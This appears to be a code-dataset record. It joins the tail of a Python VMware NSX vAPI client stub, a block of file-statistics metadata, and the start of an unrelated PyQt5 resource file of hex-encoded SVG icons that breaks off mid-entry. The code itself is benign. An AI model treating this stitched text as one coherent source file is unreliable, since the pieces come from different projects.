                'output_type': type.ReferenceType(
                    'com.vmware.nsx.model_client',
                    'VirtualNetworkInterfaceListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {'list': list_rest_metadata}

        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.vifs',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _VirtualMachinesStub(ApiInterfaceStub):
    """Stub for the ``com.vmware.nsx.fabric.virtual_machines`` interface.

    Exposes two operations:

    * ``list`` — GET /api/v1/fabric/virtual-machines with paging/filter
      parameters, returning a VirtualMachineListResult.
    * ``updatetags`` — POST /api/v1/fabric/virtual-machines with
      ``action=update_tags``, taking a VirtualMachineTagUpdate body and
      returning nothing.
    """
    def __init__(self, config):
        # Standard vAPI error mapping shared by both operations: the id
        # suffixes and binding class names come from
        # com.vmware.vapi.std.errors_client.
        def _standard_errors():
            return {
                'com.vmware.vapi.std.errors.' + err_suffix:
                    type.ReferenceType(
                        'com.vmware.vapi.std.errors_client', binding)
                for err_suffix, binding in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        # -- 'list' operation --------------------------------------------------
        # Every input field is optional; field order matches the generated
        # original.
        _optional = type.OptionalType
        list_input_type = type.StructType('operation-input', {
            'cursor': _optional(type.StringType()),
            'display_name': _optional(type.StringType()),
            'external_id': _optional(type.StringType()),
            'host_id': _optional(type.StringType()),
            'included_fields': _optional(type.StringType()),
            'page_size': _optional(type.IntegerType()),
            'sort_ascending': _optional(type.BooleanType()),
            'sort_by': _optional(type.StringType()),
        })
        list_error_dict = _standard_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []

        # Each input field maps 1:1 onto a query parameter of the same name.
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/virtual-machines',
            path_variables={},
            query_parameters={name: name for name in (
                'cursor',
                'display_name',
                'external_id',
                'host_id',
                'included_fields',
                'page_size',
                'sort_ascending',
                'sort_by',
            )},
            content_type='application/json'
        )

        # -- 'updatetags' operation --------------------------------------------
        # Single required field carrying the tag-update payload.
        updatetags_input_type = type.StructType('operation-input', {
            'virtual_machine_tag_update': type.ReferenceType(
                'com.vmware.nsx.model_client', 'VirtualMachineTagUpdate'),
        })
        updatetags_error_dict = _standard_errors()
        updatetags_input_value_validator_list = []
        updatetags_output_validator_list = []

        # POST with the payload sent as the request body; the action is
        # selected via the fixed query string in the URL template.
        updatetags_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/virtual-machines?action=update_tags',
            request_body_parameter='virtual_machine_tag_update',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType(
                    'com.vmware.nsx.model_client', 'VirtualMachineListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'updatetags': {
                'input_type': updatetags_input_type,
                'output_type': type.VoidType(),
                'errors': updatetags_error_dict,
                'input_value_validator_list': updatetags_input_value_validator_list,
                'output_validator_list': updatetags_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'list': list_rest_metadata,
            'updatetags': updatetags_rest_metadata,
        }

        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.virtual_machines',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class StubFactory(StubFactoryBase):
    """Factory for the fabric package: service classes plus the dotted
    paths of child-package stub factories.

    Entry order is preserved from the generated original; keys written as
    keyword arguments are the same strings as in the original dict literal.
    """
    _attrs = dict(
        # Service classes defined in this module.
        ComputeCollectionFabricTemplates=ComputeCollectionFabricTemplates,
        ComputeCollections=ComputeCollections,
        ComputeManagers=ComputeManagers,
        ContainerApplicationInstances=ContainerApplicationInstances,
        ContainerApplications=ContainerApplications,
        ContainerClusterNodes=ContainerClusterNodes,
        ContainerClusters=ContainerClusters,
        ContainerIngressPolicies=ContainerIngressPolicies,
        ContainerNetworkPolicies=ContainerNetworkPolicies,
        ContainerProjects=ContainerProjects,
        DiscoveredNodes=DiscoveredNodes,
        Nodes=Nodes,
        Ostypes=Ostypes,
        Vifs=Vifs,
        VirtualMachines=VirtualMachines,
        # Dotted module paths naming child-package StubFactory classes.
        compute_collections='com.vmware.nsx.fabric.compute_collections_client.StubFactory',
        compute_managers='com.vmware.nsx.fabric.compute_managers_client.StubFactory',
        nodes='com.vmware.nsx.fabric.nodes_client.StubFactory',
        virtual_machines='com.vmware.nsx.fabric.virtual_machines_client.StubFactory',
    )
| 44.747112
| 161
| 0.597553
| 20,714
| 209,148
| 5.792604
| 0.027083
| 0.067282
| 0.079308
| 0.09761
| 0.907141
| 0.891689
| 0.858786
| 0.842051
| 0.826199
| 0.81334
| 0
| 0.001276
| 0.295652
| 209,148
| 4,673
| 162
| 44.756687
| 0.813234
| 0.269058
| 0
| 0.704172
| 1
| 0.00171
| 0.308574
| 0.198605
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026676
| false
| 0
| 0.004104
| 0
| 0.075581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a621edb562c9655024f3170e500a63fcfdad5dc
| 534,717
|
py
|
Python
|
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
UI_Compiled/icons_qrc_rc.py
|
Tuhin-thinks/Github-Single-FileDownloader
|
f1473a0ea6b4b68c327d4d4d5eb3f13721cfa2f0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x01\x17\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6e\x61\x76\x69\x67\
\x61\x74\x69\x6f\x6e\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\
\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x32\x20\x32\x20\x31\
\x39\x20\x32\x31\x20\x31\x32\x20\x31\x37\x20\x35\x20\x32\x31\x20\
\x31\x32\x20\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xe4\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x61\x72\x64\x2d\
\x64\x72\x69\x76\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\
\x22\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x2e\x34\
\x35\x20\x35\x2e\x31\x31\x4c\x32\x20\x31\x32\x76\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x36\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x36\x6c\
\x2d\x33\x2e\x34\x35\x2d\x36\x2e\x38\x39\x41\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x31\x36\x2e\x37\x36\x20\x34\x48\x37\x2e\x32\
\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x37\x39\
\x20\x31\x2e\x31\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\
\x31\x36\x22\x20\x78\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\x31\x3d\x22\x31\
\x36\x22\x20\x78\x32\x3d\x22\x31\x30\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\xd9\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x65\x2d\
\x74\x65\x78\x74\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x34\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x2d\x32\x20\x32\x76\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x20\x32\x68\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x2d\x32\x56\x38\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x34\x20\x32\x20\x31\x34\x20\x38\x20\x32\x30\
\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\
\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\
\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x36\x22\x20\x79\x31\x3d\x22\x31\x37\x22\
\x20\x78\x32\x3d\x22\x38\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x30\x20\x39\x20\x39\x20\
\x39\x20\x38\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6c\x69\x64\x65\
\x72\x73\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\
\x20\x79\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x34\x22\x20\
\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\
\x31\x30\x22\x20\x78\x32\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x33\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x31\x22\x20\x78\
\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\
\x31\x32\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x30\x22\x20\x79\
\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\
\x32\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x30\x22\x20\x79\x31\x3d\x22\
\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\x22\
\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\
\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\
\x22\x20\x79\x31\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x35\x22\
\x20\x79\x32\x3d\x22\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\
\x22\x31\x36\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\
\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x83\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x6f\x77\x6e\x6c\
\x6f\x61\x64\x2d\x63\x6c\x6f\x75\x64\x22\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x31\
\x37\x20\x31\x32\x20\x32\x31\x20\x31\x36\x20\x31\x37\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\
\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x30\x2e\x38\x38\x20\x31\x38\x2e\x30\x39\x41\x35\x20\x35\
\x20\x30\x20\x30\x20\x30\x20\x31\x38\x20\x39\x68\x2d\x31\x2e\x32\
\x36\x41\x38\x20\x38\x20\x30\x20\x31\x20\x30\x20\x33\x20\x31\x36\
\x2e\x32\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x22\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x6d\x62\x72\x65\
\x6c\x6c\x61\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x33\x20\x31\x32\x61\x31\x31\x2e\x30\x35\x20\x31\x31\x2e\x30\x35\
\x20\x30\x20\x30\x20\x30\x2d\x32\x32\x20\x30\x7a\x6d\x2d\x35\x20\
\x37\x61\x33\x20\x33\x20\x30\x20\x30\x20\x31\x2d\x36\x20\x30\x76\
\x2d\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xbc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x63\x69\x73\x73\
\x6f\x72\x73\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\
\x22\x36\x22\x20\x63\x79\x3d\x22\x36\x22\x20\x72\x3d\x22\x33\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\x31\x38\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x30\x22\x20\x79\x31\
\x3d\x22\x34\x22\x20\x78\x32\x3d\x22\x38\x2e\x31\x32\x22\x20\x79\
\x32\x3d\x22\x31\x35\x2e\x38\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x34\x2e\x34\x37\
\x22\x20\x79\x31\x3d\x22\x31\x34\x2e\x34\x38\x22\x20\x78\x32\x3d\
\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x32\x30\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x2e\
\x31\x32\x22\x20\x79\x31\x3d\x22\x38\x2e\x31\x32\x22\x20\x78\x32\
\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x95\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x69\x65\x6c\
\x64\x2d\x6f\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x39\x2e\x36\x39\x20\x31\x34\x61\x36\x2e\x39\x20\x36\x2e\
\x39\x20\x30\x20\x30\x20\x30\x20\x2e\x33\x31\x2d\x32\x56\x35\x6c\
\x2d\x38\x2d\x33\x2d\x33\x2e\x31\x36\x20\x31\x2e\x31\x38\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x34\x2e\x37\x33\x20\x34\x2e\x37\x33\x4c\x34\x20\x35\x76\x37\
\x63\x30\x20\x36\x20\x38\x20\x31\x30\x20\x38\x20\x31\x30\x61\x32\
\x30\x2e\x32\x39\x20\x32\x30\x2e\x32\x39\x20\x30\x20\x30\x20\x30\
\x20\x35\x2e\x36\x32\x2d\x34\x2e\x33\x38\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\
\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\
\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\xa8\
\x3c\
